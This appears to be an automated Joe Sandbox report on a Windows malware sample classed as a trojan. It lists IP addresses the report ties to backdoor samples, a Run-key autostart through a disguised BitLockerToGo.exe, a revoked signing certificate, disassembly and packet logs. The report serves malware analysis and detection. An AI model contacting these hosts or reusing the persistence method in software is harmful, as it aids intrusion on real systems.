                                          • URL Reputation: safe
                                          		unknown
                                          http://repository.certum.pl/ctnca2.cer09BwqqVoHR71.exefalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.certum.pl/CPS0BwqqVoHR71.exefalse
                                          • URL Reputation: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          46.8.232.106
                                          		unknownRussian Federation
                                          		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                          188.130.206.243
                                          		unknownRussian Federation
                                          		200509SVINT-ASNESfalse
                                          93.185.159.253
                                          		unknownRussian Federation
                                          		39912I3B-ASATfalse
                                          91.212.166.91
                                          		unknownUnited Kingdom
                                          		35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                                          46.8.236.61
                                          		unknownRussian Federation
                                          		28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1537033
                                          Start date and time:2024-10-18 14:01:37 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 18s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:BwqqVoHR71.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:0a21a94198f6157abb36bf55cb43be27.exe
                                          Detection:MAL
                                          Classification:mal84.troj.evad.winEXE@7/3@0/5
                                          EGA Information:Failed
                                          HCA Information:Failed
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target BitLockerToGo.exe, PID 7652 because there are no executed function
                                          • Execution Graph export aborted for target BwqqVoHR71.exe, PID 7236 because there are no executed function
                                          • Execution Graph export aborted for target powershell.exe, PID 7728 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: BwqqVoHR71.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          08:03:00API Interceptor3x Sleep call for process: powershell.exe modified
                                          13:03:02AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          13:03:11AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run App C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          46.8.232.106sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.232.106/
                                          188.130.206.243antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 188.130.206.243/
                                          93.185.159.253sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/
                                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/
                                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/
                                          GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253/

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          SVINT-ASNESantispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 188.130.206.243
                                          na.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 188.130.200.140
                                          FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsSecuriteInfo.com.Win32.PWSX-gen.31473.14481.exeGet hashmaliciousStealc, VidarBrowse
                                          • 46.8.231.109
                                          NmN91TzzQT.exeGet hashmaliciousStealc, VidarBrowse
                                          • 46.8.231.109
                                          mD9WPbCEgK.exeGet hashmaliciousStealc, VidarBrowse
                                          • 46.8.231.109
                                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.236.61
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.236.61
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.236.61
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.236.61
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 46.8.236.61
                                          2efOvyn28p.exeGet hashmaliciousStealc, VidarBrowse
                                          • 46.8.231.109
                                          20fUAMt5dL.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                          • 46.8.231.109
                                          MOBILY-ASEtihadEtisalatCompanyMobilySAn5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                          • 46.44.87.100
                                          arm5.elfGet hashmaliciousMiraiBrowse
                                          • 37.243.118.61
                                          arm6.elfGet hashmaliciousUnknownBrowse
                                          • 37.243.118.25
                                          mips.elfGet hashmaliciousMiraiBrowse
                                          • 178.81.128.81
                                          sparc.elfGet hashmaliciousMiraiBrowse
                                          • 178.81.128.55
                                          m68k.elfGet hashmaliciousUnknownBrowse
                                          • 5.110.196.213
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 5.108.208.202
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 176.224.147.87
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 178.81.128.75
                                          na.elfGet hashmaliciousMiraiBrowse
                                          • 37.243.118.66
                                          I3B-ASATbotnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 78.142.85.12
                                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253
                                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253
                                          wa_3rd_party_host_32.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253
                                          3wtD2jXnxy.exeGet hashmaliciousRedLine, STRRATBrowse
                                          • 93.185.156.125
                                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253
                                          5ndBtx7pRX.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253
                                          GoogleInstaller.exeGet hashmaliciousGO BackdoorBrowse
                                          • 93.185.159.253

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1264
                                          Entropy (8bit):5.382376269983977
                                          Encrypted:false
                                          SSDEEP:24:3F5WSKco4KmM6GjKbmOIl+mZ9tYs4RPQoUGt/NK3R8O9rr:/WSU4Yym/+mZ9tz4RIoUeNWR8Gf
                                          MD5:185B6300C3F71D6831783E629F9528C7
                                          SHA1:D79BE4DF79B6A4E4C6A38350666B7B77046E7036
                                          SHA-256:E92AC4B6E0F60234C7AA058CD2D4C171EDA93B94D924D32D9708BFEACFB57A60
                                          SHA-512:F22282FD51C1F3A8F7149C527C9EC7FD07818B8B7F55F255B0A2DB574ADA2D334395E06C22104DA6DB3CBBB52CFD1D0774D3E47B05E199CB2D0C2F0E17122A1B
                                          Malicious:false
                                          Reputation:low
                                          Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.D....................+.H..!...e........System.Configuration.Ins

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkt2sm3n.qgx.ps1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lfhnqct2.1f4.psm1

                                          Download File
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.3085429709464504
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:BwqqVoHR71.exe
                                          File size:19'172'088 bytes
                                          MD5:0a21a94198f6157abb36bf55cb43be27
                                          SHA1:9a01b5e8a68be2b49250c730f8c3ecaee3734170
                                          SHA256:53fcb9786b102a6ad732878445deb13132324e59487ac841cba4e38bb990bee6
                                          SHA512:a09ed0c8e69a4f399b4c747d1b0565693caf64a0e7785ea55efd31819d638f3f84d626bdb7607dcf9338785a403f88b72c7566c532a56f2b6ded0d5c77d80fa1
                                          SSDEEP:196608:haiDgib6rJD1c/naBrlHmD0Aol3MM146sy3sjXsJrtTCZiL:p6D1UaVkDxQ4BmtZ
                                          TLSH:7917AE10FA9B40F1ED034971919BB26F63346E058B25CBDBEB957B2EFC376920876205
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........~"...............M.........@........`....@..........................P)......:%...@................................

                                          File Icon

                                          Icon Hash:833961634951097f

                                          Static PE Info

                                          General

                                          Entrypoint:0x471c40
                                          Entrypoint Section:.text
                                          Digitally signed:true
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:6
                                          OS Version Minor:1
                                          File Version Major:6
                                          File Version Minor:1
                                          Subsystem Version Major:6
                                          Subsystem Version Minor:1
                                          Import Hash:4f2f006e2ecf7172ad368f8289dc96c1

                                          Authenticode Signature

                                          Signature Valid:false
                                          Signature Issuer:CN=Certum Extended Validation Code Signing 2021 CA, O=Asseco Data Systems S.A., C=PL
                                          Signature Validation Error:A certificate was explicitly revoked by its issuer
                                          Error Number:-2146762484
                                          Not Before, Not After
                                          • 09/09/2024 10:06:13 09/09/2025 10:06:12
                                          Subject Chain
                                          • CN="Guizhou Sixuanda Technology Co., Ltd.", O="Guizhou Sixuanda Technology Co., Ltd.", L=Guiyang, S=Guizhou, C=CN, SERIALNUMBER=91520100MA6DNNXK11, OID.1.3.6.1.4.1.311.60.2.1.1=Guiyang, OID.1.3.6.1.4.1.311.60.2.1.2=Guizhou, OID.1.3.6.1.4.1.311.60.2.1.3=CN, OID.2.5.4.15=Private Organization
                                          Version:3
                                          Thumbprint MD5:62A1343435FC5131E11FA8C871BB3A1B
                                          Thumbprint SHA-1:A3AFF46C5F8E2A1F750C570698B864E75553E61F
                                          Thumbprint SHA-256:87D45B86DFCC84C5EF8338026C26F34935DBAA383A7DD583F48675AF77C957A4
                                          Serial:332576FE101609502C23F70055B4A3BE

                                          Entrypoint Preview

                                          Instruction
                                          jmp 00007F64A8E2F6F0h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          sub esp, 28h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov dword ptr [esp+10h], ebp
                                          mov dword ptr [esp+14h], esi
                                          mov dword ptr [esp+18h], edi
                                          mov dword ptr [esp], eax
                                          mov dword ptr [esp+04h], ecx
                                          call 00007F64A8E139F6h
                                          mov eax, dword ptr [esp+08h]
                                          mov edi, dword ptr [esp+18h]
                                          mov esi, dword ptr [esp+14h]
                                          mov ebp, dword ptr [esp+10h]
                                          mov ebx, dword ptr [esp+1Ch]
                                          add esp, 28h
                                          retn 0004h
                                          ret
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          sub esp, 08h
                                          mov ecx, dword ptr [esp+0Ch]
                                          mov edx, dword ptr [ecx]
                                          mov eax, esp
                                          mov dword ptr [edx+04h], eax
                                          sub eax, 00010000h
                                          mov dword ptr [edx], eax
                                          add eax, 00000BA0h
                                          mov dword ptr [edx+08h], eax
                                          mov dword ptr [edx+0Ch], eax
                                          lea edi, dword ptr [ecx+34h]
                                          mov dword ptr [edx+18h], ecx
                                          mov dword ptr [edi], edx
                                          mov dword ptr [esp+04h], edi
                                          call 00007F64A8E31B54h
                                          cld
                                          call 00007F64A8E30BDEh
                                          call 00007F64A8E2F819h
                                          add esp, 08h
                                          ret
                                          jmp 00007F64A8E31A00h
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          int3
                                          mov ebx, dword ptr [esp+04h]
                                          mov ebp, esp
                                          mov dword ptr fs:[00000034h], 00000000h
                                          mov ecx, dword ptr [ebx+04h]
                                          cmp ecx, 00000000h
                                          je 00007F64A8E31A01h
                                          mov eax, ecx
                                          shl eax, 02h
                                          sub esp, eax
                                          mov edi, esp
                                          mov esi, dword ptr [ebx+08h]
                                          cld
                                          rep movsd

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x122d0000x45e.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x12760000x1e0d8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x12462000x28f8.reloc
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x122e0000x46ac8.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x1166e000xb8.data
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x4dc9680x4dca00f482a2ef2cb5edb87b98c38afb691406unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x4de0000xc87c4c0xc87e00fb37f6883da54d37c8d09448d61f3fe6unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x11660000xc6ea00x7c0007c710d50a908c7f6ab3014874330232bFalse0.27440618699596775data5.963241990946737IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata0x122d0000x45e0x600cd66f39cc4398db79c4b9999994e1d88False0.3626302083333333data4.068932523700792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .reloc0x122e0000x46ac80x46c001516e6d890589227101e0ac3356c7e25False0.5061354350706714data6.6069875234777795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          .symtab0x12750000x40x20007b5472d347d42780469fb2654b7fc54False0.02734375data0.020393135236084953IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          .rsrc0x12760000x1e0d80x1e200db3853b5e9f878d7b090889cc5c58937False0.267083765560166data3.7343061086588305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x12762a40x4524PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9666101694915255
                                          RT_ICON0x127a7c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.10524370046137466
                                          RT_ICON0x128aff00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.1844000944733113
                                          RT_ICON0x128f2180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.24180497925311203
                                          RT_ICON0x12917c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.29338649155722324
                                          RT_ICON0x12928680x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.3762295081967213
                                          RT_ICON0x12931f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.44680851063829785
                                          RT_GROUP_ICON0x12936580x68data0.7596153846153846
                                          RT_VERSION0x12936c00x4b8COM executable for DOSEnglishUnited States0.29387417218543044
                                          RT_MANIFEST0x1293b780x560XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4251453488372093

                                          Imports

                                          DLLImport
                                          kernel32.dllWriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 18, 2024 14:03:03.001117945 CEST4974180192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:03.006057978 CEST804974146.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:03.006227970 CEST4974180192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:03.007747889 CEST4974180192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:03.012617111 CEST804974146.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:03.851664066 CEST804974146.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:03.853458881 CEST4974280192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:03.858932018 CEST804974246.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:03.859328032 CEST4974280192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:03.859328032 CEST4974280192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:03.864801884 CEST804974246.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:03.908783913 CEST4974180192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:04.725080967 CEST804974246.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:04.726628065 CEST4974380192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:04.731476068 CEST804974393.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:04.731647015 CEST4974380192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:04.732546091 CEST4974380192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:04.737296104 CEST804974393.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:04.779726028 CEST4974280192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:05.599980116 CEST804974393.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:05.601489067 CEST4974480192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:05.606509924 CEST804974491.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:05.606632948 CEST4974480192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:05.606853962 CEST4974480192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:05.611644030 CEST804974491.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:05.654145002 CEST4974380192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:06.515130997 CEST804974491.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:06.516613960 CEST4974580192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:06.521511078 CEST8049745188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:06.521625042 CEST4974580192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:06.521856070 CEST4974580192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:06.526635885 CEST8049745188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:06.569183111 CEST4974480192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:07.374522924 CEST8049745188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:07.374855995 CEST4974580192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:07.375070095 CEST4974180192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:07.375077009 CEST4974480192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:07.375077963 CEST4974280192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:07.375078917 CEST4974380192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:07.380240917 CEST8049745188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:07.380445957 CEST4974580192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:07.380803108 CEST804974146.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:07.380835056 CEST804974491.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:07.380856037 CEST4974180192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:07.380867004 CEST804974246.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:07.380897999 CEST804974393.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:07.380897045 CEST4974480192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:07.380928993 CEST4974280192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:07.380945921 CEST4974380192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:37.377110958 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:37.381903887 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:37.382122040 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:37.382446051 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:37.387204885 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:38.261029005 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:38.262501955 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:38.267400026 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:38.267601967 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:38.267755985 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:38.272521973 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:38.315036058 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:03:39.119452000 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:39.120855093 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:39.125801086 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:39.125868082 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:39.126230001 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:39.131046057 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:39.173418045 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:40.064974070 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:40.066371918 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:40.071341991 CEST804982191.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:40.071435928 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:40.071691990 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:40.076515913 CEST804982191.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:40.119621038 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:41.001111984 CEST804982191.212.166.91192.168.2.4
                                          Oct 18, 2024 14:03:41.002522945 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:41.007766008 CEST8049827188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:03:41.007884979 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:41.008100986 CEST4982780192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:03:41.012887001 CEST8049827188.130.206.243192.168.2.4
